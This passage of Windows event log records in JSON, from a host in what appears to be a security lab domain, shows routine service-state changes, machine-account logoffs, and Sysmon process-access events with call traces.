{"EventTime":"2020-08-01 07:55:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76857,"ProcessID":856,"ThreadID":948,"Channel":"System","Message":"The Portable Device Enumerator Service service entered the stopped state.","param1":"Portable Device Enumerator Service","param2":"stopped","EventReceivedTime":"2020-08-01 07:55:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16384,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12116,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"Successfully scheduled Software Protection service for re-start at 2020-08-08T07:41:56Z. Reason: RulesEngine.","EventReceivedTime":"2020-08-01 07:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":903,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12117,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service has stopped.\r\n","EventReceivedTime":"2020-08-01 07:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3914,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:56.494\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010240C0500}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:56.494","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010240C0500}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3915,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:56.494\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010240C0500}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25dfa|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:56.494","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010240C0500}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25dfa|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76858,"ProcessID":856,"ThreadID":948,"Channel":"System","Message":"The Software Protection service entered the stopped state.","param1":"Software Protection","param2":"stopped","EventReceivedTime":"2020-08-01 07:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220403,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44C8A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x44c8a","LogonType":"3","EventReceivedTime":"2020-08-01 07:56:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220404,"ProcessID":864,"ThreadID":3836,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4493B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4493b","LogonType":"3","EventReceivedTime":"2020-08-01 07:56:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3916,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220405,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44CF6\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x44cf6","LogonType":"3","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3917,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3918,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3919,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3920,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1976\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-001081E50500}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\System32\\wsqmcons.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 